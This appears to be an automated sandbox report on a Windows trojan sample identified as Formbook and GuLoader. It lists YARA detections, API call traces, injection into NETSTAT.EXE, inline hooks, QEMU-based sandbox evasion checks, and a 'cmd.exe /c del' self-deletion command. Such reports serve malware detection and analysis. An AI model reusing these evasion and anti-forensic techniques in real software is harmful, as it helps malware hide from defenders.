Source: 00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.5876788993.0000000010B5C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: wLlREXsA9M.exe PID: 7852, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 8548, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

Code function: 0_2_0040316D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,

0_2_0040316D

Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 0_2_00404923	0_2_00404923
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 0_2_004063D8	0_2_004063D8
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288D2EC	3_2_3288D2EC
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295124C	3_2_3295124C
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32891380	3_2_32891380
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328AE310	3_2_328AE310
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295F330	3_2_3295F330
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D508C	3_2_328D508C
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328900A0	3_2_328900A0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328AB0D0	3_2_328AB0D0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_329570F1	3_2_329570F1
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A51C0	3_2_328A51C0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BB1E0	3_2_328BB1E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3296010E	3_2_3296010E
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F113	3_2_3288F113
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3293D130	3_2_3293D130
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328E717A	3_2_328E717A
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0680	3_2_328A0680
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295A6C0	3_2_3295A6C0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295F6F6	3_2_3295F6F6
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289C6E0	3_2_3289C6E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_329136EC	3_2_329136EC
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BC600	3_2_328BC600
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3293D62C	3_2_3293D62C
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3294D646	3_2_3294D646
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C4670	3_2_328C4670
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32956757	3_2_32956757
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A2760	3_2_328A2760
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328AA760	3_2_328AA760
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290D480	3_2_3290D480
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0445	3_2_328A0445
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_329575C6	3_2_329575C6
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295F5C9	3_2_3295F5C9
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295FA89	3_2_3295FA89
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295CA13	3_2_3295CA13
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295EA5B	3_2_3295EA5B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32914BC0	3_2_32914BC0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328DDB19	3_2_328DDB19
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0B10	3_2_328A0B10
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295FB2E	3_2_3295FB2E
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B6882	3_2_328B6882
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A28C0	3_2_328A28C0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_329518DA	3_2_329518DA
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_329578F3	3_2_329578F3
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A3800	3_2_328A3800
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CE810	3_2_328CE810
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32940835	3_2_32940835
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32886868	3_2_32886868
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295F872	3_2_3295F872
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A9870	3_2_328A9870
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BB870	3_2_328BB870
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289E9A0	3_2_3289E9A0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295E9A6	3_2_3295E9A6
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328E59C0	3_2_328E59C0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A1EB2	3_2_328A1EB2
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32950EAD	3_2_32950EAD
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32959ED2	3_2_32959ED2
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32892EE8	3_2_32892EE8
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328E2E48	3_2_328E2E48
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C0E50	3_2_328C0E50
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32940E6D	3_2_32940E6D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295EFBF	3_2_3295EFBF
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32951FC6	3_2_32951FC6
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A6FE0	3_2_328A6FE0

Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: String function: 3288B910 appears 206 times
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: String function: 328E7BE4 appears 76 times
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: String function: 3291EF10 appears 79 times
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: String function: 3290E692 appears 67 times

Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2A80 NtClose,LdrInitializeThunk,	3_2_328D2A80
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2B90 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_328D2B90
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2BC0 NtQueryInformationToken,LdrInitializeThunk,	3_2_328D2BC0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_328D2B10
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D29F0 NtReadFile,LdrInitializeThunk,	3_2_328D29F0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2EB0 NtProtectVirtualMemory,LdrInitializeThunk,	3_2_328D2EB0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2ED0 NtResumeThread,LdrInitializeThunk,	3_2_328D2ED0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2E50 NtCreateSection,LdrInitializeThunk,	3_2_328D2E50
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2F00 NtCreateFile,LdrInitializeThunk,	3_2_328D2F00
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2CF0 NtDelayExecution,LdrInitializeThunk,	3_2_328D2CF0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2C30 NtMapViewOfSection,LdrInitializeThunk,	3_2_328D2C30
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2C50 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_328D2C50
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2DA0 NtReadVirtualMemory,LdrInitializeThunk,	3_2_328D2DA0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_328D2DC0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2D10 NtQuerySystemInformation,LdrInitializeThunk,	3_2_328D2D10
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D4260 NtSetContextThread,	3_2_328D4260
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D34E0 NtCreateMutant,	3_2_328D34E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D4570 NtSuspendThread,	3_2_328D4570
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2AA0 NtQueryInformationFile,	3_2_328D2AA0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2AC0 NtEnumerateValueKey,	3_2_328D2AC0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2A10 NtWriteFile,	3_2_328D2A10
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2B80 NtCreateKey,	3_2_328D2B80
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2BE0 NtQueryVirtualMemory,	3_2_328D2BE0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2B00 NtQueryValueKey,	3_2_328D2B00
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2B20 NtQueryInformationProcess,	3_2_328D2B20
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D38D0 NtGetContextThread,	3_2_328D38D0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D29D0 NtWaitForSingleObject,	3_2_328D29D0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2E80 NtCreateProcessEx,	3_2_328D2E80
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2EC0 NtQuerySection,	3_2_328D2EC0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2E00 NtQueueApcThread,	3_2_328D2E00
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D2FB0 NtSetValueKey,	3_2_328D2FB0

Source: wLlREXsA9M.exe, 00000003.00000002.1092236541.0000000032B30000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs wLlREXsA9M.exe
Source: wLlREXsA9M.exe, 00000003.00000002.1062526617.00000000000D0000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamenetstat.exej% vs wLlREXsA9M.exe
Source: wLlREXsA9M.exe, 00000003.00000003.1060364102.00000000025BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenetstat.exej% vs wLlREXsA9M.exe
Source: wLlREXsA9M.exe, 00000003.00000003.972434290.0000000032616000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs wLlREXsA9M.exe
Source: wLlREXsA9M.exe, 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs wLlREXsA9M.exe
Source: wLlREXsA9M.exe, 00000003.00000003.1060941431.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenetstat.exej% vs wLlREXsA9M.exe
Source: wLlREXsA9M.exe, 00000003.00000003.977676200.00000000327D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs wLlREXsA9M.exe

Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: edgegdi.dll	Jump to behavior

Source: wLlREXsA9M.exe

Static PE information: invalid certificate

Source: wLlREXsA9M.exe	Virustotal: Detection: 29%
Source: wLlREXsA9M.exe	ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

File read: C:\Users\user\Desktop\wLlREXsA9M.exe

Jump to behavior

Source: wLlREXsA9M.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\wLlREXsA9M.exe C:\Users\user\Desktop\wLlREXsA9M.exe
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Process created: C:\Users\user\Desktop\wLlREXsA9M.exe C:\Users\user\Desktop\wLlREXsA9M.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\wLlREXsA9M.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Process created: C:\Users\user\Desktop\wLlREXsA9M.exe C:\Users\user\Desktop\wLlREXsA9M.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\wLlREXsA9M.exe"	Jump to behavior

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

0_2_0040316D

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

File created: C:\Users\user\AppData\Local\Temp\nsnF6CB.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/4@22/19

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

Code function: 0_2_004020CD LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,LdrInitializeThunk,

0_2_004020CD

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

Code function: 0_2_004043B0 GetDlgItem,SetWindowTextA,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,LdrInitializeThunk,SetDlgItemTextA,

0_2_004043B0

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4792:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4792:120:WilError_03

Source: wLlREXsA9M.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: netstat.pdbGCTL source: wLlREXsA9M.exe, 00000003.00000002.1062526617.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.1060364102.00000000025BE000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1077566633.00000000025B5000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.1060941431.00000000025C5000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.5844903994.0000000000C30000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: wLlREXsA9M.exe, 00000003.00000001.908308746.0000000000649000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: netstat.pdb source: wLlREXsA9M.exe, 00000003.00000002.1062526617.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.1060364102.00000000025BE000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1077566633.00000000025B5000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.1060941431.00000000025C5000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.5844903994.0000000000C30000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: wLlREXsA9M.exe, 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.972434290.00000000324F3000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.977676200.00000000326AC000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.5846531217.00000000032FD000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000003.1066447293.000000000301C000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.5846531217.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000003.1061733268.0000000002E62000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wLlREXsA9M.exe, wLlREXsA9M.exe, 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.972434290.00000000324F3000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000003.977676200.00000000326AC000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.5846531217.00000000032FD000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000003.1066447293.000000000301C000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.5846531217.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000003.1061733268.0000000002E62000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: wLlREXsA9M.exe, 00000003.00000001.908308746.0000000000649000.00000020.00000001.01000000.00000005.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.1033536083.0000000004F47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1031033084.000000000078B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wLlREXsA9M.exe PID: 7392, type: MEMORYSTR

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

Code function: 0_2_10002D20 push eax; ret

0_2_10002D4E

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

Code function: 0_2_10001A5D LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,lstrcpyA,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_10001A5D

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

File created: C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xED

Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\wLlREXsA9M.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: wLlREXsA9M.exe, 00000000.00000002.1032796104.0000000003260000.00000004.00001000.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000000.00000002.1031033084.0000000000770000.00000004.00000020.00020000.00000000.sdmp, wLlREXsA9M.exe, 00000003.00000002.1078330404.0000000003E70000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: wLlREXsA9M.exe, 00000000.00000002.1031033084.000000000078B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Source: C:\Windows\explorer.exe TID: 10376	Thread sleep count: 74 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 10376	Thread sleep time: -148000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3668	Thread sleep count: 135 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3668	Thread sleep time: -270000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

Code function: 3_2_328D1763 rdtsc

3_2_328D1763

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 875			Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 864			Jump to behavior

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

API coverage: 1.4 %

Source: C:\Windows\SysWOW64\NETSTAT.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 0_2_0040562F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,	0_2_0040562F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 0_2_00406091 FindFirstFileA,FindClose,	0_2_00406091
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 0_2_0040270B FindFirstFileA,	0_2_0040270B

Source: C:\Users\user\Desktop\wLlREXsA9M.exe	API call chain: ExitProcess graph end node			graph_0-4153
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	API call chain: ExitProcess graph end node			graph_0-4327

